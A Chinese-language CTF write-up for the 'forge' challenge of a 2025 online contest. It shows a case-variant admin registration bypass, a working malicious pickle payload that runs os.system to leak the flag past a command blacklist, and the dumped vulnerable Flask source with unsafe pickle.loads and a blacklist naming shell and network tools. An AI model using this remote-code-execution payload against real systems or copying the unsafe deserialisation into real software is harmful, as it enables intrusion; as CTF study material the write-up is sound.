目录

  1. 1. 前言
  2. 2. forge

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

陇剑杯2025

2025/9/6 CTF线上赛
  |     |   总文章阅读量:

前言

黑盒 pickle 是坏文明!


forge

只有注册和登录两个路由,其中登录处 only admin can login

但是注册能正常注册用户

login 处有过滤,fuzz 得到

可用: ['SELECT', 'UNION', 'WHERE', 'limit', 'group', 'by', 'like', 'prepare', 'as', 'if', 'sleep', 'char', 'ascii', 'mid', 'left', 'right', 'substring', 'updatexml', 'extractvalue', 'benchmark', 'insert', 'update', 'all', '@', '^', '&', "'", '"', '~', '`', '(', ')', '=', '\\', 'database', 'column', "'1'='1", 'count', 'concat', 'cot', 'replace', '.']
不可用: ['select', 'union', 'union select', 'and', 'or', '||', 'where', 'from', 'order', 'ORDER', 'handler', '#', '*', '--', '/', ' ', 'information_schema', ';', 'rand', 'floor']

一时半会想不到绕过的方法

尝试注册 admin 账户,返回 try to bybass,猜测是逻辑绕过

尝试在 /register 大小写绕过注册

POST /register HTTP/1.1
Host: web-2803794189.challenge.longjiancup.cn
Accept-Encoding: gzip, deflate
Referer: http://web-67b31d46ab.challenge.longjiancup.cn/register
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Cache-Control: max-age=0
Origin: http://web-67b31d46ab.challenge.longjiancup.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Length: 30

username=aDmiN&password=123

然后就发现能登录了

接下来是文件上传打 pickle,先下载 example.pkl 拿 pickletools 看看格式

    0: \x80 PROTO      4
    2: \x95 FRAME      112
   11: \x8c SHORT_BINUNICODE '__main__'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'CHIKAWA'
   31: \x94 MEMOIZE    (as 1)
   32: \x93 STACK_GLOBAL
   33: \x94 MEMOIZE    (as 2)
   34: )    EMPTY_TUPLE
   35: \x81 NEWOBJ
   36: \x94 MEMOIZE    (as 3)
   37: }    EMPTY_DICT
   38: \x94 MEMOIZE    (as 4)
   39: (    MARK
   40: \x8c     SHORT_BINUNICODE 'model_name'
   52: \x94     MEMOIZE    (as 5)
   53: \x8c     SHORT_BINUNICODE 'Example'
   62: \x94     MEMOIZE    (as 6)
   63: \x8c     SHORT_BINUNICODE 'data'
   69: \x94     MEMOIZE    (as 7)
   70: C        SHORT_BINBYTES b"cbuiltins\nprint\n(S'chikawa'\ntR."
  103: \x94     MEMOIZE    (as 8)
  104: \x8c     SHORT_BINUNICODE 'parameters'
  116: \x94     MEMOIZE    (as 9)
  117: \x8c     SHORT_BINUNICODE ''
  119: \x94     MEMOIZE    (as 10)
  120: u        SETITEMS   (MARK at 39)
  121: b    BUILD
  122: .    STOP
highest protocol among opcodes = 4

执行返回 module_name Example, None

可见我们需要修改其中的 data 部分,打入我们的 opcode

接下来就是测 waf,测了一个多小时才发现 waf 的是命令执行不是 pickle。。。

另一个坑是这里用 ca\\t 读取会返回 32512,不知道什么报错,正常的话会返回 module_name Example,0

于是执行结果写入 static 下静态文件带外

import pickle

class CHIKAWA:
    pass

opcode=b'''cos
system
p0
0g0
(S'bas\\e64 /f??? -w 0 >/app/static/4.txt'
tR.'''

obj = CHIKAWA()
obj.model_name = 'Example'
obj.data = opcode
obj.parameters = ''
with open('1.pkl', 'wb') as f:
    f.write(pickle.dumps(obj))

dump 下来的源码:

app.py

from flask import Flask, render_template, request, redirect, url_for, session, flash
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
import sqlite3
import os
from datetime import datetime
import pickle, time, sys, re
from chikawa import CHIKAWA
import unicodedata

from flask import send_from_directory
app = Flask(__name__)
sys.modules['__main__'].CHIKAWA = CHIKAWA
app.secret_key = 'your_secret_key_here'
app.config['UPLOAD_FOLDER'] = 'uploads'
app.config['DATABASE'] = 'database.db'
app.config['ALLOWED_EXTENSIONS'] = {'pkl'}

os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)


def prepare(node: str) -> str:
    if node is None:
        return None
    node = unicodedata.normalize("NFKC", node)
    node = node.lower()
    node = node.strip()
    return node

def init_db():
    with app.app_context():
        conn = sqlite3.connect(app.config['DATABASE'])
        cursor = conn.cursor()
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS users (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                username TEXT UNIQUE NOT NULL,
                password TEXT NOT NULL
            )
        ''')
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS models (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                user_id INTEGER NOT NULL,
                filename TEXT NOT NULL,
                upload_time DATETIME NOT NULL,
                FOREIGN KEY (user_id) REFERENCES users (id)
            )
        ''')
        conn.commit()
        conn.close()
init_db()
def get_db():
    return sqlite3.connect(app.config['DATABASE'])
def login_required(f):
    from functools import wraps
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return decorated_function

def allowed_file(filename):
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']
@app.route('/')
def index():
    return redirect(url_for('login'))
def waf(data):
    waf_patterns = [
        r'/\*.*\*/',
        r'(?i)(and|or|\&\&|\|\|)',
        r'[\s\+\-\*\/]',
        r'union|select|from|where',
        r';|--|#',
    ]
    for pattern in waf_patterns:
        if re.search(pattern, data):
            return True
    return False

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        
        name = prepare(username)
        if name != "admin" and name != "Admin" and name != "ᴬdmin":
            flash("only admin can login")
            return redirect(request.url)

        if waf(username) or waf(password):
            flash('Invalid input detected')
            return redirect(request.url)

        conn = get_db()
        cursor = conn.cursor()
        cursor.execute('SELECT * FROM users WHERE username = ?', (username,))
        user = cursor.fetchone()
        conn.close()
        
        if user and check_password_hash(user[2], password):
            session['user_id'] = user[0]
            return redirect(url_for('panel'))
        else:
            flash('Invalid username or password')
    return render_template('login.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = generate_password_hash(request.form['password'])
        
        if username == "admin" or username == "Admin":
            flash("no access, try bypass")
            return redirect(request.url)
        
        name = prepare(username)
        conn = get_db()
        cursor = conn.cursor()
        try:
            cursor.execute('INSERT INTO users (username, password) VALUES (?, ?)', (name, password))
            conn.commit()
            conn.close()
            return redirect(url_for('login'))
        except sqlite3.IntegrityError:
            conn.close()
            flash('Username already exists')
    return render_template('register.html')
@app.route('/panel')
@login_required
def panel():
    return render_template('panel.html')
@app.route('/upload', methods=['GET', 'POST'])
@login_required
def upload():
    if request.method == 'POST':
        if 'file' not in request.files:
            flash('No file selected')
            return redirect(request.url)
        file = request.files['file']
        if file.filename == '':
            flash('No selected file')
            return redirect(request.url)
        if file and allowed_file(file.filename):
            filename = secure_filename(file.filename)
            save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
            file.save(save_path)
            conn = get_db()
            cursor = conn.cursor()
            cursor.execute('''
                INSERT INTO models (user_id, filename, upload_time)
                VALUES (?, ?, ?)
            ''', (session['user_id'], filename, datetime.now()))
            conn.commit()
            conn.close()
            flash('File uploaded successfully')
            return redirect(url_for('model'))
        else:
            flash('Only .pkl files are allowed')
    return render_template('upload.html')

@app.route('/model')
@login_required
def model():
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute('''
        SELECT id, filename, upload_time, user_id 
        FROM models 
        ORDER BY upload_time DESC
    ''')
    models = cursor.fetchall()
    conn.close()
    return render_template('model.html', models=models)



@app.route('/execute/<int:model_id>', methods=['POST'])
@login_required
def execute(model_id):
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute('SELECT filename FROM models WHERE id = ?', (model_id,))
    file_record = cursor.fetchone()
    conn.close()
    
    if file_record:
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_record[0])
        if os.path.exists(file_path):
            try:
                model = CHIKAWA.load_model(file_path)
                model_train = CHIKAWA.train(model.data)
                return f"module_name {model.model_name}, {model_train}"
            except Exception as e:
                return f"wrong data {e}"
        else:
            flash('File not found.')
    return redirect(url_for('model'))


@app.route('/download/<int:model_id>', methods=['GET'])
@login_required
def download(model_id):
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute('SELECT filename FROM models WHERE id = ?', (model_id,))
    file_record = cursor.fetchone()
    conn.close()

    if file_record:
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_record[0])
        if os.path.exists(file_path):
            return send_from_directory(app.config['UPLOAD_FOLDER'], file_record[0], as_attachment=True)
        else:
            flash('File not found.')

    return redirect(url_for('model'))

@app.route('/delete/<int:model_id>', methods=['POST'])
@login_required
def delete(model_id):
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute('SELECT filename FROM models WHERE id = ? AND user_id = ?',
                    (model_id, session['user_id']))
    file_record = cursor.fetchone()
    if file_record:
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_record[0])
        if os.path.exists(file_path):
            os.remove(file_path)
        cursor.execute('DELETE FROM models WHERE id = ?', (model_id,))
        conn.commit()
    conn.close()
    return redirect(url_for('model'))
if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0", port=8000)

chikawa.py

import builtins
import io
import pickle
import hashlib
import hmac
safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}
ALLOWED_MODEL_CLASSES = {'CHIKAWA'}
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "chikawa" and name == "CHIKAWA":
            from chikawa import CHIKAWA
            return CHIKAWA
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        if module == "__main__" or name in ALLOWED_MODEL_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")
def restricted_loads(s, secret_key=None):
    if secret_key is not None:
        try:
            data, received_digest = s.split(b'::')
            computed_digest = hmac.new(secret_key, data, hashlib.sha256).digest()
            if not hmac.compare_digest(computed_digest, received_digest):
                raise pickle.UnpicklingError("HMAC verification failed")
        except Exception as e:
            raise pickle.UnpicklingError(f"HMAC verification error: {str(e)}")
    else:
        data = s
    return RestrictedUnpickler(io.BytesIO(data)).load()
class CHIKAWA:
    def __init__(self, model_name, data, parameters):
        self.model_name = model_name
        self.data = data
        self.parameters = parameters or {}
        self._validate_parameters()
    def _validate_parameters(self):
        if not isinstance(self.model_name, str):
            raise ValueError("model_name must be a string")
        if not isinstance(self.parameters, dict):
            raise ValueError("parameters must be a dictionary")
    def train(data):
        import pickle
        forbidden = [b"bash", b"flag", b"tac", b"cat", b"ls", b"sh", b"whoami", b"curl", b"wget", b"rm", b"echo", b"chmod", b"chown", b"scp", b"ssh", b"ftp", b"nc", b"netcat", b"telnet", b"python", b"perl", b"ruby", b"java", b"php", b"javascript", b"node", b"exec", b"eval", b"import", b"subprocess", b"*", b"fl", b"fla", b"env", b"proc", b"\\x"]
        if any(f in data for f in forbidden):
            return "Hacker!"
        try:
            models = pickle.loads(data)
            return models
        except pickle.UnpicklingError as e:
            return f"error: {e}"
        except Exception as e:
            return f"{e}"
    def predict(self, input_text):
        if not isinstance(input_text, str):
            raise ValueError("Input must be a string")
        if self.parameters.get("trained", False):
            return f"{self.model_name}: {input_text[::-1]}"
        return "Model not trained yet."
    @staticmethod
    def load_model(filename, secret_key=None):
        with open(filename, "rb") as f:
            data = f.read()
        return restricted_loads(data, secret_key)
    def __reduce__(self):
        return (self.__class__, (self.model_name, self.parameters))